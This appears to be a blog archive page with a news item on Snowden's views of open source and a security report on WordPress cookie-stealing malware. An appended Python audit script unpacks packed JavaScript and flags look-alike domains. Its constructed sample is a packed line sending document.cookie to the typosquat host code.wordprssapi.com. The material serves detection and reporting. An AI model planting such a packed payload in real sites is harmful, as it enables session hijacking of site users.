Daily Archives: May 12, 2017

Why Edward Snowden loves open source


Infamous government hacker Edward Snowden believes open source is a fundamentally better way to use technology compared to proprietary technology that he believes disempowers users.

Snowden was interviewed at the OpenStack Summit in Boston, the conference of the open source cloud computing project OpenStack, via video from a nondescript location, and spoke about his personal use of open source technology. In 2013 Snowden, then a government contractor, leaked classified information about government surveillance programs run by the National Security Agency, which brought him worldwide fame.

Speaking specifically about cloud computing technology, Snowden said clouds from Amazon and Google are fine, but noted that customers using these products are “sinking costs into an infrastructure that is not yours… you’re investing into things you don’t control or shape.” Snowden raised the question: “When you’re running things in Google’s cloud, Amazon’s cloud, how do you know when you’re being spied on?” Whether it’s happening legally or illegally, Snowden argues these vendors could use customers’ information “at a layer that’s hidden from you.” There have been no credible reports of cloud vendors spying on customers.

Snowden encouraged attendees of the OpenStack Summit to “direct the future of the internet in a more free and fair way.” One way to do that, he says, is to use open source tools to build computing platforms that customers build and host themselves, which gives users more control over how data is handled.

Amazon Web Services explains on the Data Privacy section of its website that customers control their own data. “Customers maintain ownership of their customer content and select which AWS services process, store and host their customer content. We do not access or use customer content for any purpose other than as legally required and for maintaining the AWS services and providing them to our customers and their end users,” the site states. “We never use customer content or derive information from it for marketing or advertising.” Cloud vendors also offer a variety of ways that customers can encrypt data stored in the public cloud, including offering customers the ability to hold their own keys to the encryption.

Snowden is also worried about data privacy when it comes to smartphones and other technologies. “All systems should be designed to obey the user, they should not deceive or lie to the user. They shouldn’t hide from the user,” he said. Snowden said he’s working on open source code projects that allow users to verify the status of their phones, for example, to ensure that when WiFi or networking features are disabled that they truly are.

Snowden said he used a variety of open source tools to facilitate his 2013 leaking of thousands of classified government documents, including the Debian open source operating system and the Tor Project, which helps protect users’ anonymity.

Session hijacking, cookie-stealing WordPress malware spotted


Researchers have identified a strain of cookie-stealing malware injected into a legitimate JavaScript file that sends the stolen data to a domain masquerading as a WordPress core domain.

Cesar Anjos, a security analyst at Sucuri, a firm that specializes in WordPress security, came across the malware during an incident response investigation and described it in a blog post on Tuesday.

Anjos says it appears attackers used typosquatting, or URL hijacking, to craft the phony domain, code.wordprssapi[.]com. Typosquatting is a technique that usually relies on users making typographical errors when inputting URLs into a web browser. In this case, the fake site is designed to look like a legitimate WordPress domain so it doesn’t appear out of place in the code.

The researcher said it appeared attackers appended malware to the bottom of a legitimate WordPress JavaScript file; the injected code is designed to reroute sensitive information, such as cookies, to the fake domain.

Denis Sinegubko, a senior malware researcher at Sucuri, told Threatpost Wednesday that it’s likely an attacker took advantage of another vulnerability in WordPress to inject the obfuscated code in the first place.

“Modern attacks rarely use one specific vulnerability. They usually scan for multiple known vulnerabilities (mostly in third-party themes and plugins) and then exploit whatever they find,” Sinegubko said.

Anjos points out that in addition to appearing at the bottom of an actual WordPress JavaScript file – wp-includes/js/hoverIntent[.]min[.]js – the code also uses a typical obfuscation pattern, eval(function(p,a,c,k,e,d). The function, commonly used in JavaScript libraries and scripts, tightly packs code that’s later executed when the page loads.

After Anjos decoded the obfuscated code, he saw the malicious – and now offline – WordPress API site.

In this case, Anjos says a conditional statement hidden at the top of the code skips cookies when the user agent belongs to a search engine crawler. That “extra mile” by the attacker, Anjos says, helps weed out cookie information from crawlers and bots and “ensures that the data being sent to attackers is more likely to immediately be usable.”

Once it’s been determined that the data – in this case, a user’s cookies – is valuable, a script sends it to the malicious site (code.wordprssapi[.]com) so it can be siphoned up and used by attackers, Anjos says.

By stealing a user’s cookies, through what’s essentially a session hijacking attack, an attacker can pretend to be that user and perform any actions the user has permission to perform, at least until those permissions are revoked, something that’s done after a period of inactivity for many types of online accounts, including WordPress.

The domain that URL is mimicking, code.wordpressapi[.]com, isn’t even a legitimate site, the researcher points out. But in this case, that doesn’t matter; the fact that it includes the word “WordPress” is enough to make it look like it belongs, Anjos says; that’s what tricks webmasters who read the code.

“By purchasing a domain closely resembling a legitimate website platform or service, some webmasters might overlook this in their code and assume it is an official WordPress domain (which it is not),” Anjos wrote.

Sinegubko is a bit puzzled when it comes to who may be behind the malicious site.

“No clue,” Sinegubko said when asked Wednesday, “As always, WHOIS data is ‘privacy protected,’ the IP (45.32.137.126) points to vultr[.]com network (not a typical choice for hackers especially with the Windows IIS/8.5 server).”

In addition to ensuring they have clean code, webmasters should double check sites to ensure they’re not sending sensitive data, like cookies or passwords, to a third party, Anjos says.

“This is something that all webmasters should be aware of when they are auditing their own code. Be careful and always check that a domain is legitimate, especially if it is involved in collecting or sending information to a third-party site,” the researcher wrote.
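As an added example (not code from Sucuri or from the article), the audit below does the two things the researchers recommend: it statically undoes the eval(function(p,a,c,k,e,d) packer appended to a JavaScript file, without evaluating any JavaScript, and then flags every host the file references that imitates the WordPress brand but is not an official WordPress domain. The packed sample blob, the allowlist of official hosts and the send helper name inside the sample are constructed for this demonstration.

```python
import re

BRAND, OFFICIAL = "wordpress", {"wordpress.org", "wordpress.com", "w.org"}  # official hosts (constructed allowlist)
PACKER_SIG = "eval(function(p,a,c,k,e,d)"

def enc(c, a):  # token for word index c in the p,a,c,k,e,d packer: base-a digits 0-9a-zA-Z
    head = "" if c < a else enc(c // a, a)
    c %= a
    return head + (chr(c + 29) if c > 35 else "0123456789abcdefghijklmnopqrstuvwxyz"[c])

def unpack(src):  # statically undo the packer's word substitution; no JavaScript is evaluated
    m = re.search(r"\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)", src)
    if not m:
        return None
    p, base, count = m.group(1).replace("\\'", "'"), int(m.group(2)), int(m.group(3))
    words = m.group(4).split("|")
    for c in range(count - 1, -1, -1):  # same order as the packer's while(c--) loop
        if c < len(words) and words[c]:
            p = re.sub(r"\b" + re.escape(enc(c, base)) + r"\b", lambda _m, w=words[c]: w, p)
    return p

def edit_distance(a, b):  # Levenshtein distance, used to spot one-character typosquats
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def brand_lookalike(host):  # brand (or a one-edit variant of it) inside a label of a non-official host
    if host in OFFICIAL or any(host.endswith("." + o) for o in OFFICIAL):
        return False
    return any(edit_distance(label[i:i + n], BRAND) <= 1
               for label in host.split(".")
               for n in (len(BRAND) - 1, len(BRAND), len(BRAND) + 1)
               for i in range(max(1, len(label) - n + 1)))

def audit_js(src):  # -> (packer present?, decoded payload or None, look-alike hosts referenced)
    decoded = unpack(src) if PACKER_SIG in src else None
    hosts = {h.lower() for h in re.findall(r"https?://([a-z0-9.-]+)", src + (decoded or ""), re.I)}
    return PACKER_SIG in src, decoded, sorted(h for h in hosts if brand_lookalike(h))

# Constructed sample: a packed blob appended after legitimate code, as the article describes.
SAMPLE = r"""/* legitimate hoverIntent code would sit above this line */
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('var c=0.1;2("https://code.3.com/",c);',4,4,'document|cookie|send|wordprssapi'.split('|'),0,{}))"""

if __name__ == "__main__":
    print(audit_js(SAMPLE))
```

Run it over each file under wp-includes/js and wp-content; a packer blob plus a look-alike host in a file that should be unmodified core code is the signature the Sucuri post describes.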